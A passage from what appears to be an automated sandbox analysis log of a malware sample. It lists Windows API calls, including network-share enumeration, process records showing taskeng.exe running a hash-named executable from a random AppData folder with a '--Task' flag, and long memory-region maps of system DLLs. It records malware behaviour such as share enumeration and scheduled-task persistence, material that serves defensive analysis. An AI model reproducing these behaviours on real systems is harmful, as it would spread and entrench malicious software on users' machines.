WNetCloseEnum (hEnum=0x2aa9358) returned 0x0 [0102.168] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa8958 | out: hHeap=0x670000) returned 1 [0102.168] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa8910 | out: hHeap=0x670000) returned 1 [0102.168] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8910 [0102.168] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8958 [0102.168] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xe0) returned 0x2ad4e78 [0102.168] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa82e0 [0102.168] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8a78 [0102.169] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa89e8 | out: hHeap=0x670000) returned 1 [0102.169] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa89a0 | out: hHeap=0x670000) returned 1 [0102.169] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2a9e748 | out: hHeap=0x670000) returned 1 [0102.169] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa89a0 [0102.169] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa89e8 [0102.169] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2b7afe0, lphEnum=0x931fe28) Process: id = "7" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x4343e000" os_pid = "0xf98" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x368" cmd_line = "taskeng.exe {27DDD4DD-C0BF-4A6A-A879-03A7A3B63580} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1187 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1188 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1189 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1190 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1191 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1192 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1193 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1194 start_va = 0xff080000 end_va = 0xff0f3fff monitored = 0 entry_point = 0xff08f44c region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 1195 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1196 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1197 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1198 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1199 start_va = 0x290000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1200 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1201 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1202 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1203 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1204 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1205 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1206 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1207 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1208 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1209 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1210 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1211 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1212 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1213 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1214 start_va = 0x7fefa290000 end_va = 0x7fefa299fff monitored = 0 entry_point = 0x7fefa29260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1215 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1216 start_va = 0xc0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1217 start_va = 0x110000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1218 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1219 start_va = 0x100000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1220 start_va = 0x290000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1221 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1222 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1223 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1224 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1225 start_va = 0x570000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1226 start_va = 0x700000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1227 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 1228 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1229 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1230 start_va = 0x1b00000 end_va = 0x1c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1231 start_va = 0x1b00000 end_va = 0x1b7cfff monitored = 0 entry_point = 0x1b0cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1232 start_va = 0x1b90000 end_va = 0x1c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 1233 start_va = 0x1b00000 end_va = 0x1b7cfff monitored = 0 entry_point = 0x1b0cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1234 start_va = 0x7fefcb60000 end_va = 0x7fefcb6efff monitored = 0 entry_point = 0x7fefcb61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1235 start_va = 0x7fefec50000 end_va = 0x7fefec6efff monitored = 0 entry_point = 0x7fefec560e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1236 start_va = 0x1cd0000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 1237 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1238 start_va = 0x7fefe7b0000 end_va = 0x7fefe88afff monitored = 0 entry_point = 0x7fefe7d0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1239 start_va = 0x7fefc560000 end_va = 0x7fefc577fff monitored = 0 entry_point = 0x7fefc563b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1240 start_va = 0x420000 end_va = 0x464fff monitored = 0 entry_point = 0x421064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1241 start_va = 0x420000 end_va = 0x464fff monitored = 0 entry_point = 0x421064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1242 start_va = 0x420000 end_va = 0x464fff monitored = 0 entry_point = 0x421064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1243 start_va = 0x420000 end_va = 0x464fff monitored = 0 entry_point = 0x421064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1244 start_va = 0x420000 end_va = 0x464fff monitored = 0 entry_point = 0x421064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1245 start_va = 0x7fefc260000 end_va = 0x7fefc2a6fff monitored = 0 entry_point = 0x7fefc261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1246 start_va = 0x7fefe890000 end_va = 0x7fefe900fff monitored = 0 entry_point = 0x7fefe8a1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1247 start_va = 0x1e80000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1248 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1249 start_va = 0x7fefcb30000 end_va = 0x7fefcb54fff monitored = 0 entry_point = 0x7fefcb39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1250 start_va = 0x1d50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 1251 start_va = 0x1f70000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 1252 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1253 start_va = 0x1ff0000 end_va = 0x22befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1254 start_va = 0x7fefcc50000 end_va = 0x7fefcc63fff monitored = 0 entry_point = 0x7fefcc510e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1255 start_va = 0x2430000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 1256 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1257 start_va = 0x2330000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1258 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1259 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1260 start_va = 0x7fefef50000 end_va = 0x7fefefe8fff monitored = 0 entry_point = 0x7fefef51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1261 start_va = 0x7fef9f40000 end_va = 0x7fef9f48fff monitored = 0 entry_point = 0x7fef9f411a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1262 start_va = 0x7fefb5c0000 end_va = 0x7fefb615fff monitored = 0 entry_point = 0x7fefb5cbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1263 start_va = 0x24b0000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 1264 start_va = 0x7fefb150000 end_va = 0x7fefb184fff monitored = 0 entry_point = 0x7fefb151064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1265 start_va = 0x24f0000 end_va = 0x256ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 1266 start_va = 0x2590000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 1267 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1268 start_va = 0x2610000 end_va = 0x26eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002610000" filename = "" Region: id = 1269 start_va = 0x7fefb190000 end_va = 0x7fefb1a7fff monitored = 0 entry_point = 0x7fefb191130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1325 start_va = 0x26f0000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 1326 start_va = 0x2900000 end_va = 0x322ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Thread: id = 75 os_tid = 0xf9c Thread: id = 76 os_tid = 0xfa0 Thread: id = 77 os_tid = 0xfa4 Thread: id = 78 os_tid = 0xfa8 Thread: id = 79 os_tid = 0xfac Thread: id = 80 os_tid = 0xfb0 Thread: id = 81 os_tid = 0xfb4 Process: id = "8" image_name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" page_root = "0x4252c000" os_pid = "0xfb8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xf98" cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1270 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1271 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1272 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1273 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1274 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1275 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1276 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498440 region_type = mapped_file name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") Region: id = 1277 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1278 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1279 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1280 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1281 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1282 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1283 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1284 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1285 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1286 start_va = 0x1a0000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1287 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1288 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1289 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1290 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1291 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1292 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1293 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 1294 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1295 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 1296 start_va = 0x250000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1297 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1298 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1299 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1300 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1301 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1302 start_va = 0x380000 end_va = 0x3e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1303 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1304 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1305 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1306 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1307 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1308 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = 